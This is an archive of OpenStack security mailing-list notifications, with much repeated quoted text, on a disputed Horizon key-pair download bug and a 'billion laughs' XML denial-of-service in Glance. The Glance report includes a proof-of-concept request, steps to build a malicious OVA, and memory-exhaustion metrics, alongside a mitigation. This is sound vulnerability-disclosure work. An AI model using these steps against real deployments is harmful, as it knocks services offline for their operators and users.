https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From dstanek at dstanek.com Wed Sep 28 14:09:32 2016 From: dstanek at dstanek.com (David Stanek) Date: Wed, 28 Sep 2016 14:09:32 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928140932.27549.11940.malone@chaenomeles.canonical.com> Is there actually a keystone issue here? -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. 
Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Wed Sep 28 14:35:16 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 28 Sep 2016 14:35:16 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928143516.17539.55575.malone@wampee.canonical.com> Sounds like if there is a bug here, it's one in horizon which might be "fixed" to just fail the download if the URL has been crafted in the described manner rather than generating a new keypair and serving it. As discussed, this doesn't appear to be a vulnerability at all and is rather merely confusing/scary-looking behavior that can lead a curious user or researcher to misunderstand the underlying implementation and think it's vulnerable. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From lhinds at redhat.com Wed Sep 28 16:47:25 2016 From: lhinds at redhat.com (Luke Hinds) Date: Wed, 28 Sep 2016 16:47:25 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928164727.27240.25916.malone@chaenomeles.canonical.com> I was not able to replicate this. When I use the download URL from step 5 in a new window, it results in ' Unable to create key pair: Key pair 'test-luke' already exists. (HTTP 409)' I could not understand step 8 too well. Does 'select' mean the radio button, or just note down the name of another key set? Maybe I misread the test conditions to replicate this. Is there any session expiry at play here, with the keys only available within the current user's session? -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From charles.neill at rackspace.com Wed Sep 28 20:37:31 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Wed, 28 Sep 2016 20:37:31 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928203731.17427.36773.malone@wampee.canonical.com> I'm not sure I agree with the assessment that this isn't default functionality. The only thing required to enable the vulnerability is to specify an appropriate "work_dir" in Glance's configuration. If this is an unlikely or unreasonable thing to do, then I agree that this is a less severe issue. It is admittedly admin-only functionality, may not be widely used, and might be seen as deprecated by the project team, but the documentation on Tasks (which is one mechanism at play in this bug) does not in any way note that it is pending deprecation [1]. Neither are OVA/OVF images mentioned as deprecated. There are public YouTube videos explaining how to import these images [2], suggesting that at least some people are interested in using this functionality. Not trying to be alarmist, just trying to better understand the classification. [1] http://developer.openstack.org/api-ref/image/v2/index.html?expanded=create-task-detail [2] https://www.youtube.com/watch?v=_zyFzElwwW0 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. 
Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. 
(Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. 
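(The XML entity declarations in step 1 above were stripped when this message was archived; what the report describes is the canonical "billion laughs" document. A representative reconstruction follows — the element and entity names are assumed, not recovered from the original attachment.)

    <?xml version="1.0"?>
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
      <!-- lol3 through lol9 follow the same pattern -->
      <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
    ]>
    <lolz>&lol10;</lolz>

Ten levels of tenfold expansion mean &lol10; expands to 10^9 copies of the base string — gigabytes of text from a file well under a kilobyte — which is consistent with the steady drop in free RAM shown in the metrics above.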
Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From fungi at yuggoth.org Wed Sep 28 20:59:54 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 28 Sep 2016 20:59:54 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928205956.24229.22813.launchpad@soybean.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. 
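A minimal sketch of the mitigation suggested in this report — swapping xml.etree for defusedxml — is shown here; the helper name and error handling are illustrative, not the actual Glance patch:

    from defusedxml import ElementTree as safe_ET
    from defusedxml.common import EntitiesForbidden

    def parse_ovf(ovf_path):
        # defusedxml refuses to expand XML entity declarations by default,
        # so a billion-laughs document is rejected instead of expanded.
        try:
            return safe_ET.parse(ovf_path)
        except EntitiesForbidden:
            raise RuntimeError('OVF file %s contains forbidden XML entities' % ovf_path)

defusedxml also documents iterparse and fromstring replacements, which would map more directly onto the ET.iterparse() call referenced in [2].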
----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB 
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. 
(Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. 
Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From fungi at yuggoth.org Wed Sep 28 21:06:06 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 28 Sep 2016 21:06:06 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928210606.23707.3836.malone@gac.canonical.com> Charles: It looks like consensus has formed around this being a risk in an "experimental" feature (the implementation was added with known security caveats and so limited to admin users until those could be solved). Rather than trying to get patches for it backported to earlier supported releases and a security advisory sent recommending applying those patches, a security note may be drafted better describing these risks so that deployers are more aware and can avoid them. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. 
----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB 
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From charles.neill at rackspace.com Wed Sep 28 22:59:08 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Wed, 28 Sep 2016 22:59:08 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928225908.27516.3455.malone@chaenomeles.canonical.com> Okay, so it mainly comes down to the implemented spec describing it as experimental, and the reduced likelihood of exploit based on it being admin-only. Good to know for future bugs, thanks. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. 
